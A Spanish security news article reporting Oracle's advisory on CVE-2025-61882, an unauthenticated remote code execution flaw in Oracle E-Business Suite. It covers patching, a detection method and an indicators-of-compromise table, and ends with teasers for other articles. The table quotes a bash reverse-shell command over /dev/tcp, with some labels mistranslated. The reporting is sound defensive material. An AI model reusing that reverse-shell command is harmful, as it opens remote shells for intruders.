Redazione RHC : 5 octubre 2025 21:29
Oracle ha publicado un aviso de seguridad sobre una vulnerabilidad crítica identificada como CVE-2025-61882 en Oracle E-Business Suite . Esta falla puede explotarse remotamente sin autenticación , lo que podría permitir la ejecución de código malicioso en los sistemas afectados.
La compañía recomienda a sus clientes que apliquen de inmediato las actualizaciones descritas en el aviso. Oracle enfatiza la importancia de mantener las versiones de producto con soporte activo e instalar todos los parches de seguridad críticos con prontitud. En particular, la actualización de los parches críticos publicados en octubre de 2023 es un requisito previo para implementar nuevas correcciones.
Para respaldar la detección y contención inmediata de posibles ataques, la alerta incluye una matriz de riesgo con indicadores de compromiso , como direcciones IP sospechosas, comandos y archivos asociados con exploits conocidos.
La vulnerabilidad afecta específicamente a las versiones 12.2.3 a 12.2.14 de Oracle E-Business Suite . La documentación oficial, disponible a través de los enlaces proporcionados por Oracle, contiene información detallada sobre los parches y su instalación.
productos y versiones afectados | Documento de disponibilidad de parches |
---|---|
Oracle E-Business Suite, versiones 12.2.3–12.2.14 | Suite de negocios electrónicos de Oracle |
Los parches proporcionados a través del programa de alerta de seguridad solo están disponibles para las versiones cubiertas por Soporte Premier o Soporte Extendido según la Política de Soporte de por Vida de Oracle.
Las versiones no incluidas en estos programas no se someten a pruebas para detectar las vulnerabilidades reportadas, aunque aún puedan verse afectadas. Por este motivo, Oracle recomienda actualizar a versiones compatibles para garantizar la protección y la compatibilidad con los parches de seguridad.
CVE-2025-61882 afecta a Oracle E-Business Suite y se puede explotar de forma remota sin autenticación, lo que podría provocar la ejecución remota de código si se explota con éxito.
Se ha publicado en GitHub un método de detección público que ayuda a identificar instancias potencialmente obsoletas. El método marca una instancia como sospechosa cuando la página devuelve la cadena «Página de inicio de E-Business Suite» y el encabezado HTTP » Última modificación » indica una fecha anterior al 4 de octubre de 2025 (marca de tiempo Unix 1759602752 ).
Este enfoque se describe como una herramienta de detección, no como un vector de ataque , y debe utilizarse únicamente con fines de verificación y defensa. Para mitigar el riesgo, Oracle recomienda aplicar los parches descritos en el aviso de seguridad y actualizar a las versiones compatibles.
A continuación se muestran indicadores de compromiso (direcciones IP, comandos observados y archivos) para respaldar la detección, investigación y contención inmediatas.
Indicador | Tipo | Descripción |
---|---|---|
200[.]107[.]207[.]26 | Propiedad intelectual | Actividad potencial GET y POST |
185[.]181[.]60[.]11 | Propiedad intelectual | Actividad potencial GET y POST |
sh -c /bin/bash -i >& /dev/tcp//0>&1 | Dominio | Establecer una conexión TCP saliente en un puerto específico |
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oráculo_ebs_nday_exploit_poc_dispersos_lapsus_retard_cl0p_hunters.zip |
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Oracle ha publicado un aviso de seguridad sobre una vulnerabilidad crítica identificada como CVE-2025-61882 en Oracle E-Business Suite . Esta falla puede explotarse remotamente sin autenticación , l...
Google ha presentado una nueva herramienta de IA para Drive para escritorio. Se dice que el modelo se ha entrenado con millones de muestras reales de ransomware y puede suspender la sincronización pa...
Expertos de Palo Alto Networks han identificado un nuevo grupo de hackers vinculado al Partido Comunista Chino. Unit 42, la división de inteligencia de amenazas de la compañía con sede en Californi...
Los sistemas de Inteligencia Artificial Generativa (GenAI) están revolucionando la forma en que interactuamos con la tecnología, ofreciendo capacidades extraordinarias en la creación de texto, imá...
La Agencia de Seguridad de Infraestructura y Ciberseguridad de Estados Unidos (CISA) ha añadido una vulnerabilidad crítica en la popular utilidad Sudo, utilizada en sistemas Linux y similares a Unix...